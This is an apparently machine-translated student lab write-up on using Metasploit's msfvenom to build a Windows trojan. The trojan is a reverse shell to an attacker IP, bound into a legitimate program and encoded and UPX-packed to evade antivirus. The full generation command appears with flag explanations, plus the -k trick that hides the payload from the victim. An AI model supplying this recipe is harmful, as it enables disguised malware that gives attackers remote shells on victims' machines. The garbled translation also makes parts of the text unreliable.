Metasploit for Trojan generation, bundling, and killing-free

Meatsploit Introduction

Metasploit is an excellent open source (! = completely free) penetration test framework platform, the platform can be easily implemented penetration testing, Meatsploit has a wide range of interfaces, modules and so on, and even allow users to write their own modules to use. In the Metasploit framework can be conveniently implemented Trojan generation, binding, no killing. The Lab Building website has this course but is charged, how Frustrating,,,,so,,,,,:)

0X01 Select Attack payload

First, open the terminal, type: "Msfconsole", enter the Metasploit console.

Type "show payloads" to view information on all available attack payloads.
The load information listed below is all available attack loads

I used the load name: SHELL_REVERSE_TCP, is a simple bounce shell program, the function is to connect broiler (System for Windows System) command line. Of course, other attack loads can also be used to achieve different functions.

0X02 Select bundled files

One of the functions of the implementation of this experiment is to let the Trojan bundled in a other executable file, in order to facilitate the Trojan infection and spread. In fact, Meatsploit from the program template, its location in Data/templates/template.exe. Although this template is often updated, but it is still the major anti-virus Trojan manufacturers focus. In order to better achieve the kill-free, I choose a program to be bundled. I choose the program template is "IP radar", IP radar is a common and excellent system resource monitoring program. (The selection of the bundled program is random, invasive deletion)
Qqwry.dat is the IP address library of IP radar, which has nothing to do with this experiment.

0X03 about the Kill-free

Killing is a very important technology (other technologies are also important), I think a real hacker will not just be satisfied with the use of other people's software to kill. It is more safe to write your own shell than to find the shell tool directly from the Internet. Common ways to avoid killing are: Modify the signature/modify the program entry point/flower command/Add shell and so on. (On the No-kill recommendation "hackers do not kill attack and defense"-Ning, this book is a primer/ascension of the classic, the author of the book is a member of the evil octal, OH:))
In return, one of the ways to avoid killing under the Meatsploit framework is to use the MSF encoder. Its function is to re-arrange our attack load files, change the code in the executable file shape, to avoid being killed soft recognition. You can type Msfvenom-l encoders at the terminal to see all of the available encoding methods. Note Not all encoding methods are available on the Windows system. Here I choose the encoding method is:

Note Not all encoding methods are available on the Windows system. Here I choose the encoding method is:

0x04 Trojan Spawn/bundle/kill-free

Lab Environment:
Attack ip:192.168.159.134 system: Kali Linux
Target drone ip:169.254.113.77 system: Win7 (Security software: 360, COMODO)

Generate Trojan/bundle/kill-free operation as follows:

Msfvenom-p Windows/shell_reverse_tcp intended to use SHELL_REVERSE_TCP attack load
Lhost=192.168.159.134 This step is to set the attacker's IP address
lport=8080 This step is to set the attacker's listening port to receive the Trojan link request
-e X86/shikata_ga_nai This step means to re-encode the attack payload using the Shikata_ga_nai encoding
-X IPradar5.exe This step means to bundle the Trojan on the specified executable program template, here is IPradar5.exe
-I 5 here means to use the encoding method just set to 5 times the target encoding (multiple coding theoretically helps to avoid killing, but not necessarily, after all, killing soft is not a white charge .... ）
-F EXE This step means to specify the MSF encoder output format as EXE
-o/root/desktop/backdoor.exe This step is to specify the file output path after processing is complete

At this point Trojan program generation/bundle/Kill is all completed,,,,, four not four very simple .... Bright full wood has the technical content of said ....

Test below:
Set up MSF first, set it to listen 8080, wait for the link to the Trojan

。。。。。。。。
This is embarrassing ....

Not reconciled to .... And then shell out the procedure just now.
Terminal type UPX, see UPX Shell software parameters

Type the command: upx-5 Backdoor.exe is the shell of the Backdoor.exe (here for compression processing), the inconvenience of shell is to change the size of the source file, experienced security personnel can easily find this difference .... Rename to 1backdoor.exe

Re-use 360 scan
The result is very embarrassing ....

360 of the virus database seems to be good .....
Upload the shell file to Viscan for cloud Avira

Can be seen in the open anti-kill tool is not so reliable, and I found in Viscan antivirus engine, Qihoo 360 engine version is 1.0.1,, the security company is not free cooked rice the amount of ....

There is also a point, the above on the Trojan build binding operation, the host program containing the Trojan, the host program does not start, if you want to hide the Trojan file to let users realize that the host program has a problem, you have to generate Trojan in the code to add-K option, This means that the attack load is initiated in a separate process and the source host program runs unaffected.

The experiment ends here.
Same trier: Yang Xiaodung 20179202

Metasploit for Trojan generation, bundling, and killing-free